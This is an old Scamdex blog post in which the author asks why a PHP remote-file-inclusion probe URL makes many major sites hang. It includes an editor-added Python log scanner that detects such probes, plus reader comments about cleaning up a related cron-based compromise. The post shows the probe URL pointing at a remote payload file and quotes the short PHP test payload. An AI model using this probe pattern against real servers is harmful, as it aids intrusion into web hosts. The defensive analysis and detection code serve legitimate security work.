ScamBlog - Scamdex's Somewhat Cynical Take on Scams

Scamdex is a resource about scams, mainly internet-based. It contains a huge archive of carefully sifted email scams, categorized and analysed. The ScamBlog is commentary on the world of scams - scams which get bigger, cleverer and nastier day by day. These are our thoughts on stuff that makes us mad.

22 May '09

PHP Exploit URL foxes Apache

by @ 1:26 pm. Filed under Phishing, Uncategorized, Websites, humor, servers, spoof websites, tools

There are a lot of smart people out there who know way too much about computers and software and stuff, like this guy: ‘Perishable Press’. So, can someone clever please tell me why this simple URL hangs up a bunch of seemingly dissimilar web servers:

http://www.microsoft.com/errors.php?error=http://abirdseyeviewof.com/files/image/id1.txt?

My banana was once part of a bunch very similar to this one

Here’s the deal – when someone asks for a webpage on Scamdex that doesn’t exist, it shoots me a quick email to tell me about it. That way I can see if anything is broken and if anyone is trying to hack my site. My normal response to obvious hack attempts is to block the IP address or use .htaccess rewrite rules to send them to an oh-so-friendly ‘go away’ page :).

In this case, the URL carries a payload that is itself a link to a file on a remote site, which it hopes I will allow to run on my server. The code (which is reproduced in its entirety here) will, if allowed to run, return the word ‘FeelCoMz’ to the ‘sKriptKiDee’, aka ‘Wanker’, on the sending end.

<?php /* Fx29ID */ echo("FeeL"."CoMz"); die("FeeL"."CoMz"); /* Fx29ID */ ?>

So… it didn’t work: I trapped it and it raised a red flag. But then why, when I try the URL, does it make a browser stand blinking like a deer in the proverbial headlights for 120 seconds before falling flat on its back?

Analyzing the URL gets me to this reduction of required parts. A URL with:

* any .php file path,
* any query string that contains an ‘http://’,
* a file extension such as txt, gif, png etc., and
* the trailing ‘?’

will cause the same problem on an awful lot of famous-name servers, including mine: scamdex.com, uniplex.com, google.com, microsoft.com, amazon.com etc. etc.

For example, in the following link, everything except ‘www.amazon.com’ is made up:

http://www.amazon.com/a.php?b=http://c.gif?

but it still exhibits the same behaviour – WTF is going on?

and why, oh why can’t I detect it in my .htaccess file?
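As an added example (not from the post or its author), here is the four-part reduction above turned into a detector that runs over web-server access-log lines and reports the remote URL each probe tries to pull in, which is the thing worth blocking or alerting on. The log lines, client addresses and the host remote.example are constructed for the example; only the Python standard library is used.

```python
import re
from urllib.parse import parse_qsl

# Constructed sample access-log lines (Common Log Format). The first two follow
# the probe shape the post describes; the other two are ordinary requests.
SAMPLE_LOG = """\
203.0.113.7 - - [22/May/2009:13:26:01 -0700] "GET /errors.php?error=http://remote.example/files/image/id1.txt? HTTP/1.1" 404 512
203.0.113.7 - - [22/May/2009:13:26:03 -0700] "GET /a.php?b=http://c.gif? HTTP/1.1" 404 512
198.51.100.2 - - [22/May/2009:13:27:10 -0700] "GET /index.php?page=about HTTP/1.1" 200 2048
198.51.100.2 - - [22/May/2009:13:27:12 -0700] "GET /redirect.php?to=http://example.com/ HTTP/1.1" 302 0
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "\S+ (?P<target>\S+) \S+" \d{3}')
# The post's four-part shape applied to one parameter value: starts with
# http(s)://, names a file with an extension, ends with the trailing '?'.
PROBE_VALUE_RE = re.compile(r'^https?://[^\s?]+\.[a-z0-9]{2,4}\?$', re.I)
REMOTE_VALUE_RE = re.compile(r'^https?://', re.I)

def classify_target(target):
    """Classify one request target (path plus query string) as
    ('probe', url)  - .php path and a parameter value matching the full pattern,
    ('remote', url) - .php path with some other URL as a parameter value
                      (normal for redirectors, still worth logging), or
    (None, None)    - no URL in the query string."""
    path, _, query = target.partition('?')
    if not path.lower().endswith('.php') or not query:
        return None, None
    remote = None
    # parse_qsl splits on '&' only, so the payload's own trailing '?' survives.
    for _name, value in parse_qsl(query, keep_blank_values=True):
        if PROBE_VALUE_RE.match(value):
            return 'probe', value.rstrip('?')
        if remote is None and REMOTE_VALUE_RE.match(value):
            remote = value
    return ('remote', remote) if remote else (None, None)

def scan_log(text):
    """Return one (client_ip, kind, remote_url) tuple per suspicious request."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if m:
            kind, remote = classify_target(m.group('target'))
            if kind:
                hits.append((m.group('ip'), kind, remote))
    return hits

if __name__ == '__main__':
    for ip, kind, remote in scan_log(SAMPLE_LOG):
        print(f'{kind:6} from {ip}: parameter points at {remote}')
```

Because the check is on the query string rather than on whether the .php path exists, it catches probes against non-existent scripts as well as real ones.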

First person to:
1. Tell me why it’s happening.
2. Tell me how to detect it and stop it happening.
3. Tell me why Google hates me.

gets a really major serious prize like my personal desktop banana, or this lovely (chipped) coffee mug with the name of a football club I don’t support on it – or even my second-best earphones.

Good luck!

_________________________________

Still no replies and it’s still happening… where have all the gurus gone?


4 Responses to “PHP Exploit URL foxes Apache”

  1. Phil Says:

    I’m not a guru but I did get something like this on my server.

    I first deleted the cron that looked something like this.
    /home/virtual/site1/fst/var/tmp/.fx/y2kupdate >/dev/null 2>&1

    Then deleted all the files that start with php in the /tmp folder.

    I found a file, fx.tgz, that had been unzipped in the path above,
    and deleted it and the files.

    I was first made aware of all of this in my cron. Check your crons.

  2. nv1962 Says:

    For enlightenment about this specific variant of remote file inclusion (RFI) attacks, see:
    http://www.josepino.com/?howto_website_hack1

    Since you use WordPress, consider Bad Behavior. Stops ‘em good.

  3. mxw Says:

    Thanks for the note – This annoyed the life out of me for a while….

  4. mxw Says:

    l;kl;
